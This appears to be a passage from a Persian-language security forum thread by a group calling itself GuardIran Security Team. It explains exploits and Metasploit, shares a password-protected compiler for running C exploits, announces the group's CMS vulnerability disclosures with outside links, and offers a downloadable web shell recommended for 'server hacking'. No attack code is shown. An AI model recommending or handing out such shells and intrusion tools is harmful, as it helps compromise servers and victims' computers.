  21. **متا اسپلویت و اکسپلویت ها** با سلام و خسته نباشید خدمت دوستان عزیز گارد ایران،با تشکر از مدیر خوبمون که این تاپیک ارزشمند رو ایجاد کردند.ابتدا بنده یک تو ضیح درباره اکسپلیت ها و متا اسپلویت بدم. اکسپلویت اکسپلویت، یا همان کدهای مخرب، برنامه‌ها و کدهایی هستند که توسط یک یا چند هکر و یا محقق امنیتی برای اثبات و یا استفاده از آسیب‌پذیری امنیتی خاصی در یک نرم‌افزار، سیستم‌عامل و یا سخت‌افزار خاص نوشته می‌شوند.این برنامه‌ها لزوما برای خرابکاری نوشته و منتشر نمی‌شوند، اهداف تحقیقاتی و آموزشی را نیز دنبال می‌نمایند، هرچند استفاده از این کدها برای نفوذ به سیستم‌های کاربران امری متداول می‌باشد.امروزه خرید و فروش این کدها بصورت یک تجارت درآمده است، کدهای مخرب با توجه به نوع و دسته‌بندی آسیب‌پذیری مورد استفاده در آن و همچنین نوع سیستم‌های هدف و روش‌های کد نویسی گاهی تا صدها هزار دلار نیز بفروش می‌رسند .اکسپلویت (Exploit) به معنای سود بردن است. انواع اکسپلویت‌ها از نظر نوع دسترسی اکسپلویت‌های لوکالاکسپلویت‌های ریموتمتااسپلویتنرم‌افزار متااسپلویت (به انگلیسی: Metasploit) یک نرم‌افزار قوی برای نفوذ به سیستم‌های دیگر است. این نرم‌افزار امکان دسترسی به شل قربانی را به راحتی حتی بر روی ویندوز ۷ فراهم می‌کند. طرز کار این نرم‌افزار، برای شما پیوندی به برای آی‌پی‌تان با فایل نفوذ ایجاد می‌کند. کسی که روی این پیوند کلیک کند، این فایل را وارد رایانهٔ خود کرده و پس از وارد شدن این فایل به رایانهٔ فرد شما می‌توانید به راحتی دستورهای گوناگون را بر روی رایانهٔ فرد قربانی اجرا کنید. سیستم‌های میزبان این نرم‌افزار امکان نصب بر روی گنو/لینوکس، ویندوز و مک اواس را دارا می‌باشد. برای نسخهٔ لینوکس از روبی استفاده شده است.
  22. شما توسط این ابزار میتوانید کدهای زبان c رو کامپایل و به exe تبدیل کنید این کامپایلر زبان برنامهم نویسی c به شما برای run کردن اکسپلویت هایی ( اجرا کردن Exploit و کار با اکسپلویت ) که به زبان c نوشته شده اند کمک میکن pass: guardiran.org lcc.part1.rar lcc.part2.rar lcc.part3.rar
  23. درود کشف باگ در Scopus CMS و ثبت این اکسپلویت بنام تیم امنیتی گارد ایران ( GuardIran Security Team ) و لینک اثبات رو در پایین قرار دادم : . http://vulnerability-lab.com/get_content.php?id=1436 http://iedb.ir/exploits-2759.html به امید پیشرفتهای روز افزون و بالاتر تیم امنیتی گارد ایران
  24. درود کشف باگ SQL Injection Web Vulnerability در Mangallam CMS توسط تیم امنیتی گارد ایران و لینکهای اثبات رو براتون قرار دام : . لینک اثبات exploit-db http://www.exploit-db.com/exploits/35899 لینک اثبات vulnerability-lab http://vulnerability-lab.com/get_content.php?id=1421 صفحه اکسپلویتهای ثبت شده بنام تیم امنیتی گارد ایران در vulnerability-lab.com http://vulnerability-lab.com/show.php?user=GuardIran%20Securit . با آرزوی موفقیت های روزافزون برای تمامیه اعضاء محترم تیم امنیتی گارد ایران .
  25. چندتا از دوستان در پیتم خصوصی سوال کردن بهترین شل چیه ؟ جواب 100% به این سوال نمیشه داد اما اگر شلی خوب و قوی بهمراه Option های خوب میخواین همین شل Exploit-db Shell هست و برای سرور هکینگ Server Hacking بنظر بنده بسیار کارآمد هست . پسورد فایل : guardiran.org . exploit-db Shell.rar

درباره ی ما

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.
×